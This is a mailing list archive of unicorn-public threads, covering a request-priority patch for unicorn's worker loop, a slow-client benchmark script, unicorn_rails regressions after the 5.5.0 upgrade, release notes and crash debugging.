  2019-12-16 22:34  4% Traffic priority with Unicorn Bertrand Paquet
@ 2019-12-17  5:12  0% ` Eric Wong
  2019-12-18 22:06  0%   ` Bertrand Paquet
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2019-12-17  5:12 UTC (permalink / raw)
  To: Bertrand Paquet; +Cc: unicorn-public

Bertrand Paquet <bertrand.paquet@doctolib.com> wrote:
> Hello,
> 
> I would like to introduce some traffic priority in Unicorn. The goal
> is to keep critical endpoints online even if the application is
> slowing down a lot.
> 
> The idea is to classify the request at nginx level (by vhost, http
> path, header or whatever), and send the queries to two different
> unicorn sockets (opened by the same unicorn instance): one for high
> priority request, one for low priority request.
> I need to do some small modifications [1] in the unicorn worker loop
> to process high priority requests first. It seems to work:
> - I launch a first apache bench toward the low priority port
> - I launch a second apache bench toward the high priority port
> - Unicorn handles the queries only for that one, and stops answering
> the low priority traffic

> [1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#

Easier to view locally w/o JS/CSS using "git show -W" for context:

$ git remote add bpaquet https://github.com/bpaquet/unicorn
$ git fetch bpaquet
$ git show -W 58d6ba28
  <snip>
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 5334fa0c..976b728e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -676,53 +676,56 @@ def reopen_worker_logs(worker_nr)
   # runs inside each forked worker, this sits around and waits
   # for connections and doesn't die until the parent dies (or is
   # given a INT, QUIT, or TERM signal)
   def worker_loop(worker)
     ppid = @master_pid
     readers = init_worker_process(worker)
     nr = 0 # this becomes negative if we need to reopen logs
 
     # this only works immediately if the master sent us the signal
     # (which is the normal case)
     trap(:USR1) { nr = -65536 }
 
     ready = readers.dup
+    high_priority_reader = readers.first
+    last_processed_is_high_priority = false
     @after_worker_ready.call(self, worker)
 
     begin
       nr < 0 and reopen_worker_logs(worker.nr)
       nr = 0
       worker.tick = time_now.to_i
       tmp = ready.dup
       while sock = tmp.shift
         # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
         # but that will return false
         if client = sock.kgio_tryaccept
+          last_processed_is_high_priority = sock == high_priority_reader
           process_client(client)
           nr += 1
           worker.tick = time_now.to_i
         end
-        break if nr < 0
+        break if nr < 0 || last_processed_is_high_priority
       end
 
       # make the following bet: if we accepted clients this round,
       # we're probably reasonably busy, so avoid calling select()
       # and do a speculative non-blocking accept() on ready listeners
       # before we sleep again in select().
-      unless nr == 0
+      unless nr == 0 || !last_processed_is_high_priority
         tmp = ready.dup
         redo
       end
 
       ppid == Process.ppid or return
 
       # timeout used so we can detect parent death:
       worker.tick = time_now.to_i
       ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
     rescue => e
       redo if nr < 0 && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
     end while readers[0]
   end
 
   # delivers a signal to a worker and fails gracefully if the worker
   # is no longer running.

> The tradeoffs are
> - No more "bet"[2] on low priority traffic. This probably slows down
> the low priority traffic a little.

Yeah, but low priority is low priority, so it's fine to slow
them down, right? :>

> - This approach is only low / high. Not sure if I can extend it for 3
> (or more) levels of priority without a non-negligible performance
> impact (because of the "bet" above).

I don't think it makes sense to have more than two levels of
priority (zero, one, two, infinity rule?)
<https://en.wikipedia.org/wiki/Zero_One_Infinity>

> Do you think this approach is correct?

readers order isn't guaranteed, especially when inheriting
sockets from systemd or similar launchers.

I think some sort order could be defined via listen option...

I'm not sure if inheriting multiple sockets from systemd or
similar launchers using LISTEN_FDS env can guarantee ordering
(or IO.select in Ruby, for that matter).

It seems OK otherwise, I think...  Have you tested in real world?

> Do you have any better idea to have some traffic prioritization?
> (Another idea is to have dedicated workers for each priority class.
> This approach has other downsides, I would like to avoid it).
> Is it something we can introduce in Unicorn (not as default
> behaviour, but as a configuration option)?

If you're willing to drop some low-priority requests, using a
small listen :backlog value for a low-priority listen may work.
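
In a unicorn config that might look like the following (socket paths are hypothetical examples): the tiny backlog makes the kernel refuse excess low-priority connections rather than queue them behind everything else.

```ruby
# hypothetical unicorn config fragment -- paths are examples only
listen "/var/run/unicorn.high.socket", :backlog => 1024
# tiny backlog: excess low-priority clients get fast connection errors
# the proxy can surface, instead of long queueing delays
listen "/var/run/unicorn.low.socket", :backlog => 5
```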

I'm hesitant to put extra code in worker_loop method since
it can slow down current users who don't need the feature.

Instead, perhaps try replacing the worker_loop method entirely
(similar to how oob_gc.rb wraps process_client) so users who
don't enable the feature won't be penalized with extra code.
Users who opt into the feature can get an entirely different
method.
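
A minimal sketch of that opt-in pattern, using a stand-in class rather than unicorn's real internals (the class, module, and enable mechanism here are all assumptions): the override is only prepended when the feature is requested, so the stock method stays untouched for everyone else.

```ruby
# stand-in for the server class; real names are assumptions
class Server
  def worker_loop(worker)
    :stock_loop            # the existing, unmodified loop
  end
end

# opt-in replacement, analogous in spirit to how oob_gc wraps process_client
module PriorityWorkerLoop
  def worker_loop(worker)
    :priority_loop         # an entirely different loop for opted-in users
  end
end

# only done when the feature is enabled; otherwise no extra code runs
Server.prepend(PriorityWorkerLoop)
Server.new.worker_loop(nil) # => :priority_loop
```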

> Thx for any opinion.

The best option would be to never get yourself in a situation
where you're overloaded, by making everything fast :>
Anything else seems pretty ugly...

^ permalink raw reply related	[relevance 0%]

* Traffic priority with Unicorn
@ 2019-12-16 22:34  4% Bertrand Paquet
  2019-12-17  5:12  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Bertrand Paquet @ 2019-12-16 22:34 UTC (permalink / raw)
  To: unicorn-public

Hello,

I would like to introduce some traffic priority in Unicorn. The goal
is to keep critical endpoints online even if the application is
slowing down a lot.

The idea is to classify the request at nginx level (by vhost, http
path, header or whatever), and send the queries to two different
unicorn sockets (opened by the same unicorn instance): one for high
priority request, one for low priority request.
I need to do some small modifications [1] in the unicorn worker loop
to process high priority requests first. It seems to work:
- I launch a first apache bench toward the low priority port
- I launch a second apache bench toward the high priority port
- Unicorn handles the queries only for that one, and stops answering
the low priority traffic

The tradeoffs are
- No more "bet"[2] on low priority traffic. This probably slows down
the low priority traffic a little.
- This approach is only low / high. Not sure if I can extend it for 3
(or more) levels of priority without a non-negligible performance
impact (because of the "bet" above).

Do you think this approach is correct?
Do you have any better idea to have some traffic prioritization?
(Another idea is to have dedicated workers for each priority class.
This approach has other downsides, I would like to avoid it).
Is it something we can introduce in Unicorn (not as default
behaviour, but as a configuration option)?

Thx for any opinion.

Bertrand

[1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#
[2] https://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb#n707

^ permalink raw reply	[relevance 4%]

* yet-another-horribly-named-server as an nginx alternative
@ 2019-05-26  5:24 10% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2019-05-26  5:24 UTC (permalink / raw)
  To: unicorn-public

First off, it should come as no surprise to anybody nowadays
that I hate marketing :P  I also hate that anybody using unicorn
is also stuck with nginx as the only (well-known) proxy which
fully buffers both requests AND responses.

One of the major reasons I like *nix-like is interchangeable
parts, and the lack of proxies which can do what nginx does
always bothered me.  nginx has also continuously gotten more
enterprisey over the years, maybe a decidedly non-enterprisey
alternative is in order :>

Keep in mind: I am nothing more than an Internet loon with
no way to substantiate any claims I make!

Hypothetically, I've been using this server in production since
2013, and doing HTTPS termination since 2016.  It's handled
numerous hug-of-death events over the years sitting in front of
Varnish, unicorn, mod_perl stuff, PSGI stuff and also serving
static files on a cheap VPS.

Even if by some coincidence/luck unicorn somehow works well for
you, this alternative is the complete opposite in terms of
design.  I have no real production experience with epoll,
kqueue, threads or non-blocking I/O; all of which are (ab)used
by this alternative.

The yin to unicorn's yang, if you will.

Again, keep in mind that I'm an Internet loon.  I feel bad for
you if some "cool Internet companies" misled you into believing
unicorn is competently engineered.  This alternative is likely
worse given the effects of pollution and head trauma I've
suffered over the years.

I'm not going to mention this "nginx alternative" by name, here;
but it's been announced on the ruby-talk mailing list at least
(and it's mostly Ruby with some C, not that I know C).

So if anybody wants to update the unicorn docs to give this
alternative proxy equal mention with nginx, they're welcome to
send such as patch.  Please no superlatives, hype, or "marketing
speak", though.

I can't make such an update to unicorn docs myself, since I
would be abusing my position as the maintainer of this project
to market yet-another-horribly-named-server.

Thanks for understanding.


One notable difference from nginx ("nqinagntr bire atvak" vs V
jrer tbbq ng znexrgvat :P):

  Output buffering is lazy, similar to how Unicorn::TeeInput works
  (but for output, not input).  It matters for large responses:
  whereas nginx "proxy_buffering" is an on/off switch, this alternative
  only buffers response bodies when the slow client can't keep up
  with a backend (unicorn).

^ permalink raw reply	[relevance 10%]

* [PATCH 1/3] test/benchmark/ddstream: demo for slowly reading clients
  @ 2019-05-12 22:25  7% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2019-05-12 22:25 UTC (permalink / raw)
  To: unicorn-public

This is intended to demonstrate how badly we suck at dealing
with slow clients.  It can help users evaluate alternative
fully-buffering reverse proxies, because nginx should not
be the only option.

Update the benchmark README while we're at it
---
 test/benchmark/README      | 13 +++++++---
 test/benchmark/ddstream.ru | 50 ++++++++++++++++++++++++++++++++++++++
 2 files changed, 59 insertions(+), 4 deletions(-)
 create mode 100644 test/benchmark/ddstream.ru

diff --git a/test/benchmark/README b/test/benchmark/README
index 1d3cdd0..e9b7a41 100644
--- a/test/benchmark/README
+++ b/test/benchmark/README
@@ -42,9 +42,14 @@ The benchmark client is usually httperf.
 Another gentle reminder: performance with slow networks/clients
 is NOT our problem.  That is the job of nginx (or similar).
 
+== ddstream.ru
+
+Standalone Rack app intended to show how BAD we are at slow clients.
+See usage in comments.
+
 == Contributors
 
-This directory is maintained independently in the "benchmark" branch
-based against v0.1.0.  Only changes to this directory (test/benchmarks)
-are committed to this branch although the master branch may merge this
-branch occassionaly.
+This directory is intended to remain stable.  Do not make changes
+to benchmarking code which can change performance and invalidate
+results across revisions.  Instead, write new benchmarks and update
+comments/documentation as necessary.
diff --git a/test/benchmark/ddstream.ru b/test/benchmark/ddstream.ru
new file mode 100644
index 0000000..b14c973
--- /dev/null
+++ b/test/benchmark/ddstream.ru
@@ -0,0 +1,50 @@
+# This app is intended to test large HTTP responses with or without
+# a fully-buffering reverse proxy such as nginx. Without a fully-buffering
+# reverse proxy, unicorn will be unresponsive when client count exceeds
+# worker_processes.
+#
+# To demonstrate how bad unicorn is at slowly reading clients:
+#
+#   # in one terminal, start unicorn with one worker:
+#   unicorn -E none -l 127.0.0.1:8080 test/benchmark/ddstream.ru
+#
+#   # in a different terminal, start more slow curl processes than
+#   # unicorn workers and watch time outputs
+#   curl --limit-rate 8K --trace-time -vsN http://127.0.0.1:8080/ >/dev/null &
+#   curl --limit-rate 8K --trace-time -vsN http://127.0.0.1:8080/ >/dev/null &
+#   wait
+#
+# The last client won't see a response until the first one is done reading
+#
+# nginx note: do not change the default "proxy_buffering" behavior.
+# Setting "proxy_buffering off" prevents nginx from protecting unicorn.
+
+# totally standalone rack app to stream a giant response
+class BigResponse
+  def initialize(bs, count)
+    @buf = "#{bs.to_s(16)}\r\n#{' ' * bs}\r\n"
+    @count = count
+    @res = [ 200,
+      { 'Transfer-Encoding' => -'chunked', 'Content-Type' => 'text/plain' },
+      self
+    ]
+  end
+
+  # rack response body iterator
+  def each
+    (1..@count).each { yield @buf }
+    yield -"0\r\n\r\n"
+  end
+
+  # rack app entry endpoint
+  def call(_env)
+    @res
+  end
+end
+
+# default to a giant (128M) response because kernel socket buffers
+# can be ridiculously large on some systems
+bs = ENV['bs'] ? ENV['bs'].to_i : 65536
+count = ENV['count'] ? ENV['count'].to_i : 2048
+warn "serving response with bs=#{bs} count=#{count} (#{bs*count} bytes)"
+run BigResponse.new(bs, count)
-- 
EW
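
The framing BigResponse builds per chunk is plain HTTP/1.1 chunked transfer encoding: hex byte count, CRLF, payload, CRLF. A standalone check of one chunk:

```ruby
# one chunk as BigResponse constructs it (hex size + CRLF + body + CRLF)
bs = 16
chunk = "#{bs.to_s(16)}\r\n#{' ' * bs}\r\n"
chunk.start_with?("10\r\n")  # => true  (16 in hex is "10")
chunk.bytesize               # => 22    (2 size digits + 2 + 16 + 2)
```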


^ permalink raw reply related	[relevance 7%]

* Re: Issues after 5.5.0 upgrade
  2019-03-06  4:44  0%     ` Eric Wong
@ 2019-03-06  5:57  0%       ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2019-03-06  5:57 UTC (permalink / raw)
  To: Eric Wong; +Cc: Stan Pitucha, unicorn-public

On 03/06 04:44, Eric Wong wrote:
> Stan Pitucha <stan.pitucha@envato.com> wrote:
> > > I only saw one issue (proposed fix below).
> > Sorry, I solved the other one while writing the email but forgot to
> > update the intro.
> >
> > So the fix worked for the issue I mentioned, thanks! Also, running
> > unicorn directly works just fine now.
> 
> You're welcome and thanks for following up!
> 
> > I ran into another regression with unicorn_rails though. We're doing
> > some work in `after_fork` which relies on a class found in
> > `lib/logger_switcher.rb`. Unfortunately it looks like the scope
> > changed and now I get workers respawning in a loop:
> > 
> > E, [2019-03-06T15:03:04.990789 #46680] ERROR -- : uninitialized
> > constant #<Class:#<Unicorn::Configurator:0x00007fc3d113d098>>::LoggerSwitcher
> > (NameError)
> 
> Is this with `preload_app true`?  I'm not too up-to-date
> with scoping and namespace behavior stuff, actually.

This is just a guess, but we probably want to call the Unicorn.builder
lambda with the same arguments as the rails_builder lambda.

diff --git a/bin/unicorn_rails b/bin/unicorn_rails
index ea4f822..354c1df 100755
--- a/bin/unicorn_rails
+++ b/bin/unicorn_rails
@@ -132,11 +132,11 @@ def rails_builder(ru, op, daemonize)
 
   # this lambda won't run until after forking if preload_app is false
   # this runs after config file reloading
-  lambda do ||
+  lambda do |x, server|
     # Rails 3 includes a config.ru, use it if we find it after
     # working_directory is bound.
     ::File.exist?('config.ru') and
-      return Unicorn.builder('config.ru', op).call
+      return Unicorn.builder('config.ru', op).call(x, server)
 
     # Load Rails and (possibly) the private version of Rack it bundles.
     begin
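
The arity problem is easy to reproduce standalone (illustration only, not unicorn code): Ruby lambdas check their argument count strictly, so a builder declared with `do ||` blows up the moment it is called with `(x, server)`:

```ruby
# lambdas enforce arity, unlike plain procs
strict = lambda do ||
  :app
end

err = begin
  strict.call(:x, :server)  # 2 args given, 0 expected
rescue ArgumentError => e
  e.class
end
err # => ArgumentError

relaxed = lambda { |x, server| :app }
relaxed.call(:x, :server) # => :app
```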

If that doesn't fix it, keep reading.

If after_fork is referencing LoggerSwitcher, and preload_app is not set,
then I think the failure should be expected, as in that case after_fork
is called before build_app!.  That would not explain a regression,
though, as that behavior should have been true in 5.4.1.

Does the problem go away if you switch after_fork to after_worker_ready?
Is preload_app set to true?

Thanks,
Jeremy

^ permalink raw reply related	[relevance 0%]

* Re: Issues after 5.5.0 upgrade
  2019-03-06  4:07  4%   ` Stan Pitucha
@ 2019-03-06  4:44  0%     ` Eric Wong
  2019-03-06  5:57  0%       ` Jeremy Evans
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2019-03-06  4:44 UTC (permalink / raw)
  To: Stan Pitucha, Jeremy Evans; +Cc: unicorn-public

Stan Pitucha <stan.pitucha@envato.com> wrote:
> > I only saw one issue (proposed fix below).
> Sorry, I solved the other one while writing the email but forgot to
> update the intro.
>
> So the fix worked for the issue I mentioned, thanks! Also, running
> unicorn directly works just fine now.

You're welcome and thanks for following up!

> I ran into another regression with unicorn_rails though. We're doing
> some work in `after_fork` which relies on a class found in
> `lib/logger_switcher.rb`. Unfortunately it looks like the scope
> changed and now I get workers respawning in a loop:
> 
> E, [2019-03-06T15:03:04.990789 #46680] ERROR -- : uninitialized
> constant #<Class:#<Unicorn::Configurator:0x00007fc3d113d098>>::LoggerSwitcher
> (NameError)

Is this with `preload_app true`?  I'm not too up-to-date
with scoping and namespace behavior stuff, actually.

I'm too tired at the moment, maybe Jeremy can help figure this out.

> config/unicorn.rb:97:in `block in reload'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:653:in
> `init_worker_process'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:681:in
> `worker_loop'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:548:in
> `spawn_missing_workers'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:562:in
> `maintain_worker_count'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:295:in
> `join'
> /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/bin/unicorn_rails:209:in
> `<top (required)>'
> bin/unicorn_rails:17:in `load'
> bin/unicorn_rails:17:in `<main>'
> E, [2019-03-06T15:03:04.992143 #46194] ERROR -- : reaped
> #<Process::Status: pid 46680 exit 1> worker=1
> 
> The LoggerSwitcher was previously resolved by rails automatically.

^ permalink raw reply	[relevance 0%]

* Re: Issues after 5.5.0 upgrade
  @ 2019-03-06  4:07  4%   ` Stan Pitucha
  2019-03-06  4:44  0%     ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Stan Pitucha @ 2019-03-06  4:07 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, Jeremy Evans

> I only saw one issue (proposed fix below).
Sorry, I solved the other one while writing the email but forgot to
update the intro.

So the fix worked for the issue I mentioned, thanks! Also, running
unicorn directly works just fine now.

I ran into another regression with unicorn_rails though. We're doing
some work in `after_fork` which relies on a class found in
`lib/logger_switcher.rb`. Unfortunately it looks like the scope
changed and now I get workers respawning in a loop:

E, [2019-03-06T15:03:04.990789 #46680] ERROR -- : uninitialized
constant #<Class:#<Unicorn::Configurator:0x00007fc3d113d098>>::LoggerSwitcher
(NameError)
config/unicorn.rb:97:in `block in reload'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:653:in
`init_worker_process'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:681:in
`worker_loop'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:548:in
`spawn_missing_workers'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:562:in
`maintain_worker_count'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:295:in
`join'
/Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/bin/unicorn_rails:209:in
`<top (required)>'
bin/unicorn_rails:17:in `load'
bin/unicorn_rails:17:in `<main>'
E, [2019-03-06T15:03:04.992143 #46194] ERROR -- : reaped
#<Process::Status: pid 46680 exit 1> worker=1

The LoggerSwitcher was previously resolved by rails automatically.

^ permalink raw reply	[relevance 4%]

* Issues after 5.5.0 upgrade
@ 2019-03-06  1:47  5% Stan Pitucha
    0 siblings, 1 reply; 200+ results
From: Stan Pitucha @ 2019-03-06  1:47 UTC (permalink / raw)
  To: unicorn-public

Hi, I'm running into two issues after an upgrade from 5.4.1 (a few
previous versions worked just fine as well). I've got a rails 5.2 app
started via:

bin/unicorn_rails -E development -c config/unicorn.rb

With the minimal config.ru in place (require environment, run app), I get:

I, [2019-03-06T12:28:44.393406 #43714]  INFO -- : Refreshing Gem list
ArgumentError: wrong number of arguments (given 0, expected 2)
  /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn.rb:49:in
`block in builder'
  /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/bin/unicorn_rails:139:in
`block in rails_builder'
  /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:794:in
`build_app!'
  /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/lib/unicorn/http_server.rb:141:in
`start'
  /Users/viraptor/.rbenv/versions/2.5.3/lib/ruby/gems/2.5.0/gems/unicorn-5.5.0/bin/unicorn_rails:209:in
`<top (required)>'
  bin/unicorn_rails:17:in `load'
  bin/unicorn_rails:17:in `<top (required)>'

Any ideas how to debug this further? (I made an attempt at bisecting
the last release, but ran into yet another issue there with building
native extensions when installing 5.4.1 over another version of 5.4.1,
so I gave up for now - let me know if that's the only way.)

-- 

Stan Pitucha

Site Reliability Engineer at Envato
http://envato.com

^ permalink raw reply	[relevance 5%]

* Re: Log URL with murder_lazy_workers
       [not found]         ` <CADGZSScpXo7-PvM=Ki64hhPSzWAsjyT+fWKAZ9-30U69x+54iA@mail.gmail.com>
@ 2018-01-15  3:22  4%       ` Sam Saffron
  0 siblings, 0 replies; 200+ results
From: Sam Saffron @ 2018-01-15  3:22 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: Eric Wong, unicorn-public

Hi Jeremy,

Yes, we already have statement_timeout set; it just does not trigger
under extreme load because it's usually a pile-up of papercuts and not one
big nasty query: 26 seconds in, you issue yet another query and...
boom. I guess we could prepend a custom exec that times out early and
re-sets it per statement.

Thanks for the suggestion of the info file, I will consider adding
something like it.

Sam

On Mon, Jan 15, 2018 at 1:40 PM, Jeremy Evans <jeremyevans0@gmail.com> wrote:
> On Sun, Jan 14, 2018 at 6:18 PM, Sam Saffron <sam.saffron@gmail.com> wrote:
>>
>> It is super likely this could be handled in the app if we had:
>>
>> db_connection.timeout_at Time.now + 29
>>
>> Then the connection could trigger the timeout and kill off the request
>> without needing to tear down the entire process and re-forking.
>>
>> Making this happen is a bit tricky cause it would require some hacking
>> on the pg gem.
>
>
> Sam,
>
> For this particular case, you can SET statement_timeout (29000) on the
> PostgreSQL connection, but note that is a per statement timeout, not a per
> web request timeout.
>
> What I end up doing for important production apps is have the worker log
> request information for each request to an open file descriptor
> (seek(0)/write/truncate), and having the master process use the contents of
> the worker-specific file to report errors in case of worker crashes.
>
> Thanks,
> Jeremy
>
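
The seek(0)/write/truncate pattern Jeremy describes can be sketched in a few
lines (the file name and record format below are made up for illustration):

```ruby
require 'tempfile'

# One small per-worker status file, rewritten in place on every request so
# the master can read the worker's last request after a crash.
status = Tempfile.new('worker-status')

def record_request(io, line)
  io.seek(0)                 # rewind to the start
  io.write(line)             # overwrite the previous record
  io.truncate(line.bytesize) # drop any tail left over from a longer record
  io.flush
end

record_request(status, 'GET /slow-endpoint pid=1234')
record_request(status, 'GET /ok')

status.seek(0)
last = status.read
puts last # only the most recent record survives: "GET /ok"
```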

^ permalink raw reply	[relevance 4%]

* [ANN] unicorn 5.4.0 - Rack HTTP server for fast clients and Unix
@ 2017-12-23 23:42  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-12-23 23:42 UTC (permalink / raw)
  To: ruby-talk, unicorn-public; +Cc: James P Robinson Jr, Sam Saffron

unicorn is an HTTP server for Rack applications designed to only serve
fast clients on low-latency, high-bandwidth connections and take
advantage of features in Unix/Unix-like kernels.  Slow clients should
only be served by placing a reverse proxy capable of fully buffering
both the request and response in between unicorn and slow clients.

* https://bogomips.org/unicorn/
* public list: unicorn-public@bogomips.org
* mail archives: https://bogomips.org/unicorn-public/
* git clone git://bogomips.org/unicorn.git
* https://bogomips.org/unicorn/NEWS.atom.xml
* nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn

Changes:

Rack hijack support improves as the app code can capture and use
the Rack `env' privately without copying it (to avoid clobbering
by another client).  Thanks to Sam Saffron for reporting and
testing this new feature:
  https://bogomips.org/unicorn-public/CAAtdryPG3nLuyo0jxfYW1YHu1Q+ZpkLkd4KdWC8vA46B5haZxw@mail.gmail.com/T/

We also now support $DEBUG being set by the Rack app (instead of
relying on the "-d" CLI switch).  Thanks to James P Robinson Jr
for reporting this bug:
  https://bogomips.org/unicorn-public/D6324CB4.7BC3E%25james.robinson3@cigna.com/T/
  (Coincidentally, this fix will be irrelevant for Ruby 2.5
   which requires 'pp' by default)

There's a few minor test cleanups and documentation updates, too.

All commits since v5.3.1 (2017-10-03):

    reduce method calls with String#start_with?
    require 'pp' if $DEBUG is set by Rack app
    avoid reusing env on hijack
    tests: cleanup some unused variable warnings
    ISSUES: add a note about Debian BTS interopability

Roughly all mailing discussions since the last release:

  https://bogomips.org/unicorn-public/?q=d:20171004..20171223

^ permalink raw reply	[relevance 4%]

* Re: Bug, probably related to Unicorn
  @ 2017-09-27  7:05  5%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-09-27  7:05 UTC (permalink / raw)
  To: Felix Yasnopolski; +Cc: unicorn-public

Felix: Ping?  Did you ever get a chance to try the things I
suggested in my previous message or figure this out another way?

ref: https://bogomips.org/unicorn-public/20170914091548.GA13634@dcvr/

Thanks.

^ permalink raw reply	[relevance 5%]

* initialize/fork crash in macOS 10.13
@ 2017-08-04 16:40  4% Jeffrey Carl Faden
  0 siblings, 0 replies; 200+ results
From: Jeffrey Carl Faden @ 2017-08-04 16:40 UTC (permalink / raw)
  To: unicorn-public

According to this post...
http://www.sealiesoftware.com/blog/archive/2017/6/5/Objective-C_and_fork_in_macOS_1013.html

The rules around initialize and fork() have changed in macOS 10.13, which is coming out in a month or so. I tried using Unicorn today to run a unicorn_rails instance, and got this as part of my traceback:

objc[95737]: +[__NSPlaceholderDictionary initialize] may have been in progress in another thread when fork() was called. We cannot safely call it or ignore it in the fork() child process. Crashing instead. Set a breakpoint on objc_initializeAfterForkError to debug.
E, [2017-08-04T08:35:28.148339 #95531] ERROR -- : reaped #<Process::Status: pid 95736 SIGABRT (signal 6)> worker=1

I'm not sure if this is something downstream, but I thought I'd bring it to your attention. My temporary solution is to preface my commands with OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES.
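
For anyone hitting the same crash, the workaround amounts to setting that
variable in the environment before starting unicorn (the invocation below is
illustrative; adjust for your own setup):

```shell
# macOS 10.13 Objective-C fork-safety workaround: disables the new
# +initialize check in fork()ed children. Use only as a stopgap.
export OBJC_DISABLE_INITIALIZE_FORK_SAFETY=YES
bin/unicorn_rails -E development -c config/unicorn.rb
```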

Jeffrey

^ permalink raw reply	[relevance 4%]

* Re: Random crash when sending USR2 + QUIT signals to Unicorn process
  2017-07-13 19:34  5% ` Eric Wong
@ 2017-07-14 10:21  0%   ` Pere Joan Martorell
  0 siblings, 0 replies; 200+ results
From: Pere Joan Martorell @ 2017-07-14 10:21 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public, Philip Cunningham, Jonathan del Strother

2017-07-13 21:34 GMT+02:00 Eric Wong <e@80x24.org>:
> +Cc: Philip and Jonathan  since they encountered this three years
> ago, but we never heard back from them:
>
>         https://bogomips.org/unicorn-public/?q=T_NODE+d:..20170713
>
>
> Pere Joan Martorell <pere.joan@camaloon.com> wrote:
>> > /home/deployer/.rbenv/versions/2.4.1/lib/ruby/gems/2.4.0/gems/unicorn-5.3.0/lib/unicorn/http_request.rb:80:in `parse': method `hash' called on unexpected T_NODE object (0x0055b15b973508 flags=0xaa31b) (NotImplementedError)
>
>> Any idea what is happening?
>
> This is most likely a bug in a C extension not using write
> barriers correctly (perhaps via undocumented C-API functions in
> Ruby).
>
> I don't think I've seen this on ruby-core bug reports in a few years:
>
>         https://public-inbox.org/ruby-core/?q=T_NODE
>
> Fwiw, Appendix D on Generational GC in the Ruby source is
> worth reading to any C extension authors:
>
>         https://80x24.org/mirrors/ruby.git/plain/doc/extension.rdoc
>
> There are probably build warnings when using some dangerous methods/macros,
> maybe you can check build logs for const warnings.
>
>
> Can you share the list of RubyGems you have loaded and maybe try
> upgrading/replacing/eliminating the ones with C extensions
> one-by-one until the error stops?

Thank you very much for your fast reply. I'm not using Bundler to
manage my dependencies, but I checked it and there's not any conflict
between gem versions.
It seems that I solved the issue by removing some of the gems. This was my gem list:

    cuba -v 3.8.0
    slim -v 3.0.8
    cutest -v 1.2.3
    rack-test -v 0.6.3
    sequel -v 4.46.0
    pg -v 0.20.0
    shotgun -v 0.9.2
    shield -v 2.1.1
    sequel_pg -v 1.6.19
    unicorn -v 5.3.0
    capistrano-rbenv -v 2.1.1

And I finally removed these gems:

    cutest -v 1.2.3
    rack-test -v 0.6.3
    shotgun -v 0.9.2
    sequel_pg -v 1.6.19

I suspect that the conflicting gem was 'sequel_pg' (sequel_pg
overwrites the inner loop of the Sequel postgres adapter's row-fetching
code with a C version that is significantly faster than the pure-Ruby
version Sequel uses by default), but since I didn't remove these gems
one by one I can't be completely sure.

If the problem reemerges I'll keep you informed.

Thanks!! :)


>
> Also, perhaps the output of "pmap $PID_OF_WORKER" if you're on
> Linux (or equivalent command if you're on another OS).
>
> Anyways, I didn't notice anything suspicious in your config.
>
> I'll do another self-audit of the unicorn + kgio + raindrops
> extensions, too, but judging from the lack of reports and how
> much they get used; I suspect the bug is elsewhere (more eyes
> welcome, of course).
>
> Thanks for the report and any more info you can provide!

^ permalink raw reply	[relevance 0%]

* Re: Random crash when sending USR2 + QUIT signals to Unicorn process
  @ 2017-07-13 19:34  5% ` Eric Wong
  2017-07-14 10:21  0%   ` Pere Joan Martorell
  0 siblings, 1 reply; 200+ results
